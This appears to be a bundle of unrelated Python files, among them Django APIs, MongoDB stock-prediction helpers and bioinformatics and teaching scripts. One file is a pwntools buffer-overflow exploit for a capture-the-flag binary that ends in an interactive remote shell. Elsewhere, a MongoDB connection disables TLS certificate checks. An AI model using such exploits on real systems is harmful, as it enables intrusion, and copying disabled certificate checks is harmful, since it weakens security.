# Stock-movement journal: purchase / checkout / return events per category.
class InventoryRecord(models.Model):
    accessory = models.CharField('配件', max_length=20, choices=accessory_item.items())
    operate = models.CharField('操作', max_length=8, choices=(('purchase', '采购'), ('receive', '领用'), ('revert', '归还')))
    server = models.ForeignKey(Server, on_delete=models.CASCADE, help_text='服务器', blank=True, null=True)
    net_device = models.ForeignKey(NetDevice, on_delete=models.CASCADE, help_text='网络设备', blank=True, null=True)
    content = models.CharField('内容', max_length=250, blank=True, null=True)
    user = models.ForeignKey(User, on_delete=models.CASCADE, help_text='操作员')
    created_date = models.DateTimeField('创建时间', auto_now_add=True)
    class Meta:
        db_table = 'cmdb_acc_inventory_record'
        verbose_name = u'配件进货及消费记录表'
        verbose_name_plural = u'配件进货及消费记录表'
|
# -*- coding: utf-8 -*-
import serial
import time
# Open the USB serial adapter at 9600 baud (blocking reads).
ser = serial.Serial('/dev/ttyUSB1', 9600)
def SringRead():
    """Read one newline-terminated line from the serial port and return it.

    NOTE(review): name looks like a typo for StringRead; kept because main()
    calls it by this name.
    """
    return ser.readline()
def StringWrite(string):
    # Send the payload out the serial port.
    # NOTE(review): pyserial 3.x requires bytes — a str argument would need
    # string.encode(); confirm the targeted pyserial/Python version.
    ser.write(string)
def main():
    """Interactive echo loop: prompt for a line, send it over the serial
    port, wait briefly, and print whatever the device replies.

    Fix: the original used the Python-2 statement `print result`, a syntax
    error under Python 3 (the rest of the script already uses py3 input()).
    """
    while True:
        var = input("Enter string: ")
        if not var:
            # empty input: re-prompt without sending anything
            continue
        StringWrite(var)
        time.sleep(0.5)  # give the device time to respond
        result = SringRead()
        if result:
            print(result)
# Run the interactive loop only when executed as a script.
if __name__ == "__main__":
    main()
|
from psychopy import parallel, core, event
import os, sys, inspect
import GlobalVariables
# `readPort` may live in a subfolder next to this script; if the plain import
# fails, add that subfolder to sys.path and retry.
# Fix: the original used C-style brace syntax (`try{ ... } except {`), which
# is not valid Python at all.
try:
    import readPort
except ImportError:
    # use this if you want to include modules from a subfolder
    cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(
        os.path.split(inspect.getfile(inspect.currentframe()))[0], "subfolder")))
    if cmd_subfolder not in sys.path:
        sys.path.insert(0, cmd_subfolder)
    import readPort  # retry now that the subfolder is on sys.path
'''
Connects to a port and allows binary manipulation
Example: raise/lower an operant box hopper
portValue: a hexadecimal number used to represent the current values on the port
parallelPort: a pre-created ParallelPort with an existing address
maskValue: a hexadecimal number representing a bitmask which flips bits on the port
@author: Bradley Poulette
'''
class HardwareInterface:
    """Connects to a port and allows binary manipulation of its data lines.

    turn_on ORs the mask into the stored port value; turn_off ANDs with the
    mask's complement; both write the new value to the parallel port and
    return it.
    """

    def __init__(self, portValue, parallelPort, mask=0x0000):
        self.portValue = portValue
        self.parallelPort = parallelPort
        self.maskValue = mask

    def turn_on(self):
        # Fix: the original read bare `portValue`/`maskValue`/`parallelPort`,
        # which raised NameError at call time — the state lives on `self`.
        self.portValue = self.portValue | self.maskValue
        self.parallelPort.setData(self.portValue)
        return self.portValue

    def turn_off(self):
        self.portValue = self.portValue & ~self.maskValue
        self.parallelPort.setData(self.portValue)
        return self.portValue
class Mouse:
    """Keyboard and game-port helpers for the experiment session."""

    def _logged_escape_check(self):
        # Poll the keyboard once; log and terminate the program if escape was hit.
        if event.getKeys(["escape"]):
            GlobalVariables.logger.writeToLog("User pressed escape")
            exit()

    def waitForExitPress(self, time = 0):
        """Watch for the escape key for `time` seconds (forever when time == 0)."""
        GlobalVariables.logger.writeToLog("Waiting for user to press escape")
        if time == 0:
            while True:
                self._logged_escape_check()
        else:
            countdown = core.CountdownTimer(time)
            while countdown.getTime() > 0:
                self._logged_escape_check()

    def readValue(self, portValue, mask):
        """Return the port reading with only the masked bits kept."""
        return readPort.readPort(portValue) & mask
#Reads IR beam status on port 0x0201 (GamePort)
def checkForApparatus():
    """Return True when the apparatus is detected on the game port,
    False otherwise; any read failure counts as "not present".

    Fix: the original used invalid brace syntax (`try{ ... } except {`) and
    the non-existent name `false`.
    """
    try:
        value = readPort.readPort(0x0201)
        GlobalVariables.logger.writeToLog("Apparatus value " + str(value))
        return value == 0x00ff
    except Exception:
        return False
#!/usr/bin/python3
# -*- coding:utf-8 -*-
"""
@author: tianwen
@file: 累加.py
@time: 2020/8/14 9:06
@desc:
"""
# First approach: linear accumulation. (Original note: slower than the
# closed-form version below, especially for many repeated calls.)
def func(n):
    """Return the sum 0 + 1 + ... + n using the built-in sum()."""
    # Replaces the original manual `thesum += i` loop with the C-speed builtin.
    return sum(range(n + 1))
print(func(100))
# Second approach: Gauss closed form — O(1), faster than the loop above.
def fun(n):
    """Return the sum 0 + 1 + ... + n via the closed-form formula.

    Fixes: the original looped n+1 times recomputing the same formula
    (shadowing the builtin `sum` along the way) and returned a float from
    true division; (1+n)*n is always even, so integer division is exact.
    """
    return (1 + n) * n // 2
print(fun(10))
def move( n, x, y, z):
    """Print the moves that transfer n disks from peg x to peg z, using
    peg y as the spare (Tower of Hanoi)."""
    if n == 1:
        print(x, "-->", z)
        return
    move(n - 1, x, z, y)   # park the top n-1 disks on the spare peg y
    print(x, "-->", z)     # move the largest disk straight to the target
    move(n - 1, y, x, z)   # bring the parked disks from y onto z
# Ask how many disks to move, then print the full solution.
num=int(input("输入移动的圆盘数量"))
print("移动步骤如下:")
move(num,'X','Y','Z')
|
import requests
import os
import json
from py2neo import authenticate, Graph
import sys
if __name__ == "__main__":
    # Sync this member's Meetup group memberships into a local Neo4j graph.
    # Fix: the original used Python-2-only `print` statements; the
    # function-call form below behaves identically on Python 2 and 3.
    # member_id = "19057581"
    member_id = sys.argv[1]
    key = os.environ['MEETUP_API_KEY']
    uri = "https://api.meetup.com/2/groups?lat=51.5072&lon=0.1275&member_id={0}&key={1}".format(member_id, key)
    r = requests.get(uri)
    results = r.json()["results"]
    group_ids = [str(item["id"]) for item in results]
    print("Group ids for {0}".format(member_id))
    print("{0}".format(group_ids))
    authenticate("localhost:7474", "neo4j", "medium")
    graph = Graph()
    # Groups the member belongs to on Meetup but not yet in the graph.
    rows = graph.cypher.execute(
        """
        MATCH (g:Group) WHERE g.id IN {group_ids}
        MATCH (m:Member {id: {member_id}})
        WHERE NOT (m)-[:MEMBER_OF]->(g)
        RETURN g.id AS groupId, g.name as groupName
        """, {"group_ids": group_ids, "member_id": str(member_id)})
    print("")
    print("Groups you aren't currently a member of:")
    print(rows)
    # Create the missing MEMBER_OF relationships, stamping when first seen.
    graph.cypher.execute(
        """
        MATCH (g:Group) WHERE g.id IN {group_ids}
        MATCH (m:Member {id: {member_id}}) WHERE NOT (m)-[:MEMBER_OF]->(g)
        MERGE (m)-[membershipRel:MEMBER_OF]->(g)
        ON CREATE SET membershipRel.joined = timestamp()
        """, {"group_ids": group_ids, "member_id": str(member_id)})
|
import json
from django.contrib.auth import authenticate
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse
from django.utils import timezone
from rest_framework import permissions, status, generics
from rest_framework.response import Response
from rest_framework.views import APIView
from travel.models import Product
from travel.paginations import StandardPagination
from .models import ReservationHost
from .serializers import ReservationSerializer, ReservationMemberSerializer
class MakeReservation(APIView):
    """POST: create a reservation host for a pilgrimage product.

    Body: username / christian_name / phone_number / gender / product (pk).
    Returns the stored fields plus a 4-part reservation number on success,
    or HTTP 400 with a Korean error message.
    """
    permission_classes = (permissions.AllowAny,)

    def post(self, request, *args, **kwargs):
        name = request.data.get('username', '')
        christian_name = request.data.get('christian_name', '')
        phone_number = request.data.get('phone_number', '')
        gender = request.data.get('gender', True)
        product = request.data.get('product', '')
        try:
            product_object = Product.objects.get(pk=product)
        except ObjectDoesNotExist:
            # message: "please be sure to select a pilgrimage product"
            data = {
                'message': '순례 상품을 반드시 선택해 주세요!'
            }
            return HttpResponse(json.dumps(data),
                                content_type='application/json; charset=utf-8',
                                status=status.HTTP_400_BAD_REQUEST)
        # create_user returns (user, reservation_num_list); presumably a
        # 4-segment reservation code — verify against the custom manager.
        user, reservation_num_list = ReservationHost.objects.create_user(
            name=name,
            christian_name=christian_name,
            phone_number=phone_number,
            gender=gender,
            product=product_object,
        )
        if user:
            data = {
                'product': user.product.title,
                'username': user.username,
                'christian_name': user.christian_name,
                'phone_number': user.phone_number,
                'gender': user.gender,
                'reservation_num': f'{reservation_num_list[0]}-'
                                   f'{reservation_num_list[1]}-'
                                   f'{reservation_num_list[2]}-'
                                   f'{reservation_num_list[-1]}'
            }
            return HttpResponse(json.dumps(data),
                                content_type='application/json; charset=utf-8',
                                status=status.HTTP_201_CREATED)
        else:
            # message: "the input is invalid; please try again"
            data = {
                'message': '입력 정보가 잘못되었습니다. 다시 입력해주세요!'
            }
            return HttpResponse(json.dumps(data),
                                content_type='application/json; charset=utf-8',
                                status=status.HTTP_400_BAD_REQUEST)
class CheckReservation(APIView):
    """POST: authenticate by name/password and return the host's reservation details."""
    permission_classes = (permissions.AllowAny,)

    def post(self, request, *args, **kwargs):
        name = request.data.get('name', '')
        password = request.data.get('password', '')
        user = authenticate(
            username=name,
            password=password,
        )
        if user:
            # The reservation details live on the related ReservationHost row.
            data = {
                'pk': user.pk,
                'product': user.reservationhost.product.title,
                'product_pk': user.reservationhost.product.pk,
                'username': user.username,
                'christian_name': user.reservationhost.christian_name,
                'phone_number': user.reservationhost.phone_number,
                'gender': user.reservationhost.gender,
            }
            return HttpResponse(json.dumps(data),
                                content_type='application/json; charset=utf-8',
                                status=status.HTTP_200_OK)
        else:
            # message: "the input is invalid; please try again"
            data = {
                'message': '입력 정보가 잘못되었습니다. 다시 입력해주세요!'
            }
            return HttpResponse(json.dumps(data),
                                content_type='application/json; charset=utf-8',
                                status=status.HTTP_400_BAD_REQUEST)
class CancelReservation(APIView):
    """POST: soft-cancel the authenticated host's reservation.

    Marks the ReservationHost row inactive and stamps date_canceled; the row
    is kept for history (hard deletion is DestroyReservation's job).
    """
    permission_classes = (permissions.AllowAny,)

    def post(self, request, *args, **kwargs):
        name = request.data.get('name', '')
        password = request.data.get('password', '')
        user = authenticate(
            username=name,
            password=password,
        )
        if user:
            product = user.reservationhost.product_id
            host = user.pk
            queryset = Product.objects.get(pk=product)
            instance = queryset.reservationhost_set.get(pk=host)
            # Fix: set both fields, then persist once — the original issued
            # two consecutive save() calls (two UPDATE queries).
            instance.date_canceled = timezone.localtime()
            instance.is_active = False
            instance.save()
            # Fix: the original passed the code positionally, which sent
            # "200" as the response *body*; status= sets the HTTP status.
            return Response(status=status.HTTP_200_OK)
        else:
            data = {
                'message': '입력 정보가 잘못되었습니다. 다시 입력해주세요!'
            }
            return HttpResponse(json.dumps(data),
                                content_type='application/json; charset=utf-8',
                                status=status.HTTP_400_BAD_REQUEST)
class UpdateReservation(APIView):
    """PATCH: update a reservation — not implemented yet (stub)."""
    permission_classes = (permissions.AllowAny,)

    def patch(self, request, *args, **kwargs):
        # TODO: implement reservation update.
        pass
class DestroyReservation(APIView):
    """DELETE: permanently remove a ReservationHost row (authenticated only)."""
    permission_classes = (permissions.IsAuthenticated,)

    def delete(self, request, *args, **kwargs):
        pk = request.data.get('pk', '')
        # Fix: objects.get() raises DoesNotExist rather than returning a
        # falsy value, so the original `if user:` else-branch was
        # unreachable and a bad pk produced a 500. filter().first()
        # yields None for a missing row.
        user = ReservationHost.objects.filter(pk=pk).first()
        if user:
            user.delete()
            # Fix: pass the code via status=; positionally it became the body.
            return Response(status=status.HTTP_204_NO_CONTENT)
        else:
            data = {
                'message': '입력 정보가 잘못되었습니다. 다시 입력해주세요!'
            }
            return HttpResponse(json.dumps(data),
                                content_type='application/json; charset=utf-8',
                                status=status.HTTP_400_BAD_REQUEST)
class AllReservationList(generics.ListAPIView):
    """Paginated list of every reservation host for one product (URL kwarg product_pk)."""
    permission_classes = (permissions.IsAuthenticatedOrReadOnly,)
    pagination_class = StandardPagination
    serializer_class = ReservationSerializer

    def get_queryset(self):
        # NOTE(review): .get() raises DoesNotExist (→ 500) for an invalid
        # product_pk — presumably guarded upstream; verify.
        product = Product.objects.all()
        select = product.get(pk=self.kwargs['product_pk'])
        return select.reservationhost_set.all()
class ActiveReservationList(generics.ListAPIView):
    """Like AllReservationList, but only hosts that have not been cancelled
    (is_active=True)."""
    permission_classes = (permissions.IsAuthenticatedOrReadOnly,)
    pagination_class = StandardPagination
    serializer_class = ReservationSerializer

    def get_queryset(self):
        product = Product.objects.all()
        select = product.get(pk=self.kwargs['product_pk'])
        return select.reservationhost_set.filter(is_active=True)
class ReservationHostRetrieveDestroy(generics.RetrieveDestroyAPIView):
    """GET/DELETE a single reservation host, addressed by product_pk + host_pk."""
    permission_classes = (permissions.IsAuthenticated,)
    serializer_class = ReservationSerializer
    lookup_url_kwarg = 'host_pk'

    def get_queryset(self):
        # Scope the lookup to the product named in the URL.
        product = Product.objects.all()
        select = product.get(pk=self.kwargs['product_pk'])
        return select.reservationhost_set.all()
class ReservationMemberListCreate(generics.ListCreateAPIView):
    """List/create the travelling members attached to one reservation host
    (URL kwarg host_pk)."""
    permission_classes = (permissions.AllowAny,)
    pagination_class = StandardPagination
    serializer_class = ReservationMemberSerializer

    def get_queryset(self):
        host = ReservationHost.objects.all()
        select = host.get(pk=self.kwargs['host_pk'])
        return select.reservationmember_set.all()
class ReservationMemberRetrieveUpdateDestroy(generics.RetrieveUpdateDestroyAPIView):
    """GET/PATCH/DELETE a single member of a reservation, addressed by
    host_pk + member_pk."""
    permission_classes = (permissions.AllowAny,)
    serializer_class = ReservationMemberSerializer
    lookup_url_kwarg = 'member_pk'

    def get_queryset(self):
        host = ReservationHost.objects.all()
        select = host.get(pk=self.kwargs['host_pk'])
        return select.reservationmember_set.all()
|
from credentials import mongodb_key
from pymongo import MongoClient
from datetime import datetime, timedelta
import pandas as pd
# Set db access (shared Atlas client reused by every function below).
# NOTE(review): TLS certificate verification is disabled
# (ssl_cert_reqs=CERT_NONE) — confirm this is intentional.
db_client = MongoClient(f"mongodb+srv://{mongodb_key.username}:{mongodb_key.password}@clusterk.su3fg.azure.mongodb.net/<dbname>?ssl=true&ssl_cert_reqs=CERT_NONE&retryWrites=true&w=majority")
def db_last_update_date(ticker='AMZN', db_name='test_stock_raw', collection_name='amzn_raw',
                        query_end_date=None, db_first_date=datetime(2015, 1, 1)):
    """
    # Check the last date of the existing stock data in DB
    - Args: ticker, db_name, collection_name, query_end_date, db_first_date
    - Returns: collection_last_date (datetime object)

    Fixes vs. original: the `datetime.now()` default was evaluated once at
    import time (stale on long-running processes), and
    `collection_last_date` was left unbound — UnboundLocalError at return —
    when both queries came back empty.
    """
    if query_end_date is None:
        query_end_date = datetime.now()
    stock_db = db_client[db_name]
    stock_collection = stock_db[collection_name]
    collection_last_date = db_first_date  # fallback when no data is found
    if collection_name in stock_db.list_collection_names():
        date_30_days_ago = query_end_date - timedelta(days=30)
        # query stock data for the past 30 days from query_end_date
        query_result = stock_collection.find(
            {'Stock': ticker,
             'Datetime': {'$gte': date_30_days_ago, '$lte': query_end_date}})
        # Materialise the dates directly (Cursor.count() is deprecated/removed
        # in modern pymongo).
        result_date_list = [doc['Datetime'] for doc in query_result]
        if result_date_list:
            print(f'{len(result_date_list)} documents found for the past 30 days from {query_end_date}')
        else:
            # nothing recent: widen the query to the configured first date
            print('query_result.count() = 0 for the past 30 days')
            query_result = stock_collection.find(
                {'Stock': ticker,
                 'Datetime': {'$gte': db_first_date, '$lte': query_end_date}})
            result_date_list = [doc['Datetime'] for doc in query_result]
        if result_date_list:
            collection_last_date = max(result_date_list)
            print(f'mongodb collection_last_date = {collection_last_date}')
        else:
            print(f'result_date_list is empty!!!')
    else:
        print("Creating a new collection since it doesn't exist.......")
        print("Stock data between 2015-01-01 and today will be uploaded by default, unless selected otherwise.")
    return collection_last_date
############
def stock_data_query(ticker=['AMZN'], db_name='test_stock_raw', collection_name='amzn_raw', past_days=5*365):
    """
    # Query raw stock data (for the past 5 years period, by default)
    - Args: ticker, db_name, collection_name, past_days
    - Returns: raw_df (DataFrame sorted by Datetime; empty Datetime-only
      frame when the collection does not exist)

    NOTE(review): the `ticker` default is a *list* but it is matched with
    equality against the scalar 'Stock' field — confirm callers pass a
    plain string.
    """
    stock_db = db_client[db_name]
    stock_collection = stock_db[collection_name]
    if collection_name in stock_db.list_collection_names():
        past_days_start = datetime.now() - timedelta(days=past_days+5) #manually added 5 more days
        today = datetime.now()
        # query stock data for the requested window ending today
        query_result = stock_collection.find({ 'Stock':ticker,
                                              'Datetime': {'$gte': past_days_start, '$lte': today}})
        raw_df = pd.DataFrame(list(query_result)).sort_values(by=['Datetime'], ascending=True)
    else:
        raw_df = pd.DataFrame({'Datetime':[]})
        print(f'Query process interrupted... No collection {collection_name} in DB {db_name} exists!!')
    return raw_df
############
def ml_pred_post(ticker=None, stock_last_day=None, train_pred_df=None, val_pred_df=None, test_pred_df=None,
                 X_features=None, y_features=None, n_past_days=90, n_future_days=5, loss='mean_squared_error', lr=0.01, epochs=12, batch_size=32, RMSE_train_pred=None, RMSE_val_pred=None):
    """
    # Create a post (stock price prediction data with ML model parameters) for upload to MongoDB
    - Args: ticker, stock_last_day, train_pred_df, val_pred_df, test_pred_df,
            X_features, y_features, n_past_days, n_future_days,
            loss, lr, epochs, batch_size,
            RMSE_train_pred, RMSE_val_pred
    - Returns: pred_post_to_upload (dict), or None (implicitly) when any
      input is missing/malformed — callers must handle a None result.
    """
    try:
        # DataFrames are flattened to lists of row-dicts for BSON storage.
        train_pred_df_dict = train_pred_df.to_dict(orient='records')
        val_pred_df_dict = val_pred_df.to_dict(orient='records')
        test_pred_df_dict = test_pred_df.to_dict(orient='records')
        n_X_features = len(X_features)
        n_y_features = len(y_features)
        # The hyper-parameter block mirrors the LSTM architecture used by the
        # training code; kept alongside the predictions for reproducibility.
        pred_post_to_upload = {
            'Stock': ticker,
            'Datetime': stock_last_day,
            'X_features': X_features,
            'y_features': y_features,
            'n_past_days': n_past_days,
            'n_future_days': n_future_days,
            'ML Model': {
                'model': 'LSTM',
                'parameters': {
                    'layers': {'LSTM_1 units': 64,
                               'LSTM_1 input_shape': (n_past_days, n_X_features),
                               'LSTM_2 units': 32,
                               'Dropout': 0.2,
                               'Dense units': n_future_days*n_y_features
                               },
                    'compile': {
                        'optimizer': 'Adam',
                        'loss': str(loss),
                        'lr': lr
                    },
                    'fit': {
                        'epochs': epochs,
                        'batch_size': batch_size
                    }
                },
            },
            'RMSE_train_pred': float(RMSE_train_pred),
            'RMSE_val_pred': float(RMSE_val_pred),
            'train_pred': train_pred_df_dict,
            'val_pred': val_pred_df_dict,
            'test_pred': test_pred_df_dict
        }
        return pred_post_to_upload
    except Exception as e:
        # Best-effort: log and fall through (returns None).
        print('Something went wrong...')
        print(f'str(e) = {str(e)}')
        # print(f'repr(e) = {repr(e)}')
        # return pred_post_to_upload
############
def stock_pred_upload(post, ticker = 'test_ticker', db_name='test_stock_pred'):
    """
    # Upload a post (stock price prediction data with ML model parameters) to MongoDB
    - Args: post, ticker, db_name
    - Returns: n/a (side effect: insert into <ticker>_pred collection)
    """
    stock_pred_db = db_client[db_name]
    stock_pred_collection = stock_pred_db[f'{ticker.lower()}_pred']
    stock_pred_collection.insert_one(post)
    print(f'{ticker} stock pred data upload to MongoDB successfully!')
    # NOTE(review): Database.collection_names() was removed in pymongo 4
    # (use list_collection_names()) — confirm the pinned pymongo version.
    stock_pred_db_collection_names = stock_pred_db.collection_names()
    print(f'stock_pred_db_collection_names = {stock_pred_db_collection_names}')
############
def ml_pred_data_query(ticker='AMZN', db_name='test_stock_pred', collection_name='amzn_pred',
                       stock_last_date=None, n_future_days=5, n_past_days=90):
    """
    # Query ML Model Prediction Data for the selected conditions from MongoDB
    - Args: ticker, db_name, collection_name, stock_last_date, n_future_days, n_past_days
    - Returns: query_result (pymongo cursor)
    """
    stock_db = db_client[db_name]
    stock_collection = stock_db[collection_name]
    # Fix: the original tested `stock_last_date is str`, which compares the
    # *value* to the str class and is always False; isinstance() is the
    # correct check, so 'YYYY-MM-DD' strings are actually parsed.
    if isinstance(stock_last_date, str):
        stock_last_date = datetime.strptime(stock_last_date, '%Y-%m-%d')
    query_result = stock_collection.find({'Stock': ticker,
                                          'Datetime': stock_last_date,
                                          'n_future_days': n_future_days,
                                          'n_past_days': n_past_days})
    return query_result
############
def ml_pred_data_query_count(ticker='AMZN', db_name='test_stock_pred', collection_name='amzn_pred',
                             stock_last_date=None, n_future_days=5, n_past_days=90):
    """
    # Check how many ML Model Prediction Data for the selected conditions exist in MongoDB collection
    - Args: ticker, db_name, collection_name, stock_last_date, n_future_days, n_past_days
    - Returns: query_result_count (int)
    """
    stock_db = db_client[db_name]
    stock_collection = stock_db[collection_name]
    # Fix: `stock_last_date is str` is always False (identity test against
    # the str class); use isinstance() so date strings get parsed.
    if isinstance(stock_last_date, str):
        stock_last_date = datetime.strptime(stock_last_date, '%Y-%m-%d')
    query_result_count = stock_collection.count_documents({'Stock': ticker,
                                                           'Datetime': stock_last_date,
                                                           'n_future_days': n_future_days,
                                                           'n_past_days': n_past_days})
    return query_result_count
############
# Manual smoke test: exercises the query helpers against the live cluster.
if __name__ == '__main__':
    print("+++++++++ Checking <db_last_update_date> function... +++++++++++++")
    ### Check the last date of the existing stock data in MongoDB collection
    collection_last_date = db_last_update_date(ticker='GOOG', db_name='test_stock_raw',
                                               collection_name='goog_raw', query_end_date=datetime.now())
    print(f'collection_last_date = {collection_last_date}')
    print(f'collection_last_date in string format = {collection_last_date.strftime("%Y-%m-%d")}')
    ###
    print("\n++++ Checking <db_last_update_date> + <ml_pred_data_query> function... ++++\n")
    selected_stock = 'GOOG'
    n_future_days = 3
    last_pred_updated_date = db_last_update_date(ticker=selected_stock,
                                                 db_name='test_stock_pred', collection_name=f'{selected_stock.lower()}_pred')
    print(f'last_pred_updated_date = {last_pred_updated_date}')
    query_result = ml_pred_data_query(ticker=selected_stock, db_name='test_stock_pred',
                                      collection_name=f'{selected_stock.lower()}_pred',
                                      stock_last_date=last_pred_updated_date,
                                      n_future_days=n_future_days)
    # print(f'query_result = {list(query_result)}')
    # NOTE(review): Cursor.count() was removed in pymongo 4 — confirm the
    # pinned pymongo version or switch to count_documents().
    print(f'query_result.count() = {query_result.count()}')
    # find the model result with the smallest RMSE_val_pred value
    RMSE_val_pred_list = []
    for i in range(query_result.count()):
        RMSE_val_pred_list.append(query_result[i]["RMSE_val_pred"])
        print(f'RMSE_train_pred {i} = {query_result[i]["RMSE_train_pred"]}')
        print(f'RMSE_val_pred {i} = {query_result[i]["RMSE_val_pred"]}')
    smallest_RMSE_index = RMSE_val_pred_list.index(min(RMSE_val_pred_list))
    print(f'smallest_RMSE_index = {smallest_RMSE_index}')
    # create test_pred_df using the query result with the smallest RMSE of the ml model
    test_pred = query_result[smallest_RMSE_index]["test_pred"][0]
    test_pred_datetime = test_pred["Datetime_list"]
    test_pred_datetime_str = test_pred["Datetime_str"]
    test_pred_adj_close = test_pred["Adj Close pred"]
    test_pred_df = pd.DataFrame(list(zip(test_pred_datetime, test_pred_adj_close, test_pred_datetime_str)),
                                columns= ['Datetime', 'Adj Close pred', 'Datetime_str'])
    print(f'test_pred_df: \n {test_pred_df}')
    print(f'RMSE_train_pred = {query_result[smallest_RMSE_index]["RMSE_train_pred"]}')
    print(f'RMSE_val_pred = {query_result[smallest_RMSE_index]["RMSE_val_pred"]}')
|
#!/usr/bin/python3 -u
import argparse
import os
import numpy as np
import os.path as op
import pandas as pd
from utils_wgbs import validate_files_list
from multiprocessing import Pool
from os.path import splitext, basename
import sys
from utils_wgbs import load_beta_data, trim_to_uint8, default_blocks_path, eprint
def get_bins(df):
    """Return (bin_edges, is_block_start) for np.add.reduceat over CpG sites.

    df must carry integer 'ssite'/'esite' columns (1-based site indices);
    edges are returned 0-based, and the boolean mask marks edges that start
    a real block (block starts plus the final block's end).
    """
    end = 28217449  # todo: read this from a reference file
    arr = np.unique(np.concatenate([[1], df['ssite'], df['esite'], [end]]))
    arr.sort()
    # Fix: the original indexed df['esite'][df.shape[0] - 1] by *label*,
    # which raises KeyError once rows were filtered out upstream (main()
    # drops empty blocks). .iloc[-1] takes the last row by position.
    isin = np.isin(arr, np.concatenate([df['ssite'], [df['esite'].iloc[-1]]]))
    return arr - 1, isin
def apply_filter_wrapper(args, blocks_bins, finds, beta_path, df):
    """Collapse one beta file into per-block sums and write <beta>_<blocks>.bin.

    Runs inside a worker process; failures are printed rather than raised so
    one bad beta file doesn't kill the whole Pool.
    """
    try:
        # load beta file:
        data = load_beta_data(beta_path)
        # reduce to blocks:
        blocks_bins[-1] -= 1
        reduced_data = np.add.reduceat(data, blocks_bins)[finds][:-1]
        # dump to file
        out_name = splitext(splitext(basename(args.blocks_file))[0])[0]
        out_name = splitext(basename(beta_path))[0] + '_' + out_name + '.bin'
        out_name = out_name.replace('_genome', '')
        out_name = op.join(args.out_dir, out_name)
        trim_to_uint8(reduced_data).tofile(out_name)
        print(out_name)
        if args.bedGraph:
            with np.errstate(divide='ignore', invalid='ignore'):
                # per-block methylation ratio = methylated / covered
                beta_vals = reduced_data[:, 0] / reduced_data[:, 1]
            eprint(beta_vals.shape, df.shape)
            # beta_vals[reduced_data[:, 1] == 0] = np.nan
            df['beta'] = beta_vals
            df.to_csv(out_name.replace('.bin', '.bedGraph'), sep='\t',
                      index=None, header=None, na_rep=-1,
                      float_format='%.2f')
    except Exception as e:
        print('Failed with beta', beta_path)
        print('Exception:', e)
def main():
    """
    Collapse beta file to blocks binary file, of the same beta format
    """
    args = parse_args()
    files = args.input_files
    validate_files_list(files, '.beta')
    if not op.isfile(args.blocks_file):
        eprint('Invalid blocks file:', args.blocks_file)
        return
    names = ['chr', 'sloc', 'eloc', 'ssite', 'esite']
    df = pd.read_csv(args.blocks_file, sep='\t', usecols=[0, 1, 2, 3, 4], header=None, names=names)
    # Blocks with ssite == esite contain no CpGs and would create empty bins.
    nr_removed = df[df.ssite == df.esite].shape[0]
    if nr_removed:
        eprint('removed {} regions with no CpGs'.format(nr_removed))
        if args.debug:
            eprint(df[df.ssite == df.esite])
    df = df[df.ssite < df.esite]
    blocks_bins, filtered_indices = get_bins(df)
    # One worker per beta file; each writes its own output independently.
    with Pool() as p:
        for beta_path in files:
            params = (args, blocks_bins,
                      filtered_indices, beta_path, df[['chr', 'sloc', 'eloc']])
            p.apply_async(apply_filter_wrapper, params)
        p.close()
        p.join()
    # for beta_path in files:
    #     reduced_data = apply_filter_wrapper(beta_path, args.blocks, args.cov_thresh)
def parse_args():
    """Build and parse the command-line interface for this tool."""
    parser = argparse.ArgumentParser(description=main.__doc__)
    parser.add_argument('input_files', nargs='+', help='one or more beta files')
    parser.add_argument('-b', '--blocks_file', help='blocks path', default=default_blocks_path)
    parser.add_argument('-o', '--out_dir', help='output directory. Default is "."', default='.')
    parser.add_argument('--bedGraph', action='store_true', help='output a text file in addition to binary file')
    parser.add_argument('--debug', '-d', action='store_true')
    return parser.parse_args()
# Script entry point.
if __name__ == '__main__':
    main()
|
from pwn import *
context.log_level = 'debug'
#p = process('./bjdctf_2020_babystack')
p = remote('node3.buuoj.cn',27983)
# Address of the backdoor function in the target binary, plus a lone `ret`
# gadget — presumably used to realign the stack for system(); verify
# against the binary's disassembly.
backdoor_addr = 0x4006e6
ret_addr = 0x400561
p.recvuntil('name:\n')
# Overflow: 0x10-byte buffer + 8 bytes of saved RBP, then the ret-slide
# into the backdoor.
payload = b'a' * ( 0x10 + 8 ) + p64(ret_addr) + p64(backdoor_addr)
# The binary first asks for an input length; send one big enough to allow
# the oversized name.
p.sendline(str(len(payload)))
p.recvuntil('name?\n')
p.sendline(payload)
p.interactive()
|
# Adapted for numpy/ma/cdms2 by convertcdms.py
import cdms2 as cdms, MV2 as MV, genutil
import sys
import cdat_info
# Locate the CDAT sample data and the three yearly zonal-wind files to combine.
pth=cdat_info.get_prefix()+'/sample_data/'
files = [ pth+'u_2000.nc',
pth+'u_2001.nc',
pth+'u_2002.nc',
]
# Read each yearly file and build two stacks of the variable 'u':
#  - `accumulation`: years appended along the existing time dimension
#  - `newdim`: years stacked along a new leading "year" dimension
# Fix: the original used Python-2-only `print` statements; the single-argument
# function-call form below behaves identically on Python 2 and 3.
for file in files:
    f = cdms.open(file)
    u = f('u')
    if file == files[0]:  # First file: initialise both accumulators
        sh = list(u.shape)    # Create a list with the shape of the data
        sh.insert(0, 1)       # Insert value 1 in front of the list
        accumulation = u
        newdim = MV.reshape(u, sh)  # Create a new 1D dimension
    else:
        # add u at the end of accumulation on dimension 0
        accumulation = MV.concatenate((accumulation, u))
        tmp = MV.reshape(u, sh)                # Create a new 1D dimension
        newdim = MV.concatenate((newdim, tmp))  # Add u over the new dimension
    f.close()
print(accumulation.shape)  # All time added over the same dimension
print(newdim.shape)        # Has a new dimension for years
avg = MV.average(accumulation)
std = genutil.statistics.std(newdim)
print(avg.shape)
print(std.shape)
|
# Read two word lists from the user, de-duplicate each, and report the
# intersection, the two set differences, and their union.
numero = int(input("Dígame cuántas palabras tiene la primera lista: "))
if numero < 1:
    print("¡Imposible!")
else:
    primera = []
    for i in range(numero):
        print("Dígame la palabra", str(i + 1) + ": ", end="")
        palabra = input()
        primera += [palabra]
    print("La primera lista es:", primera)
    # Drop duplicates in place, scanning backwards so deletion is index-safe.
    for i in range(len(primera)-1, -1, -1):
        if primera[i] in primera[:i]:
            del(primera[i])
    numero2 = int(input("Dígame cuántas palabras tiene la segunda lista: "))
    if numero2 < 1:
        print("¡Imposible!")
    else:
        segunda = []
        for i in range(numero2):
            print("Dígame la palabra", str(i + 1) + ": ", end="")
            palabra = input()
            segunda += [palabra]
        print("La segunda lista es:", segunda)
        # De-duplicate the second list the same way.
        for i in range(len(segunda)-1, -1, -1):
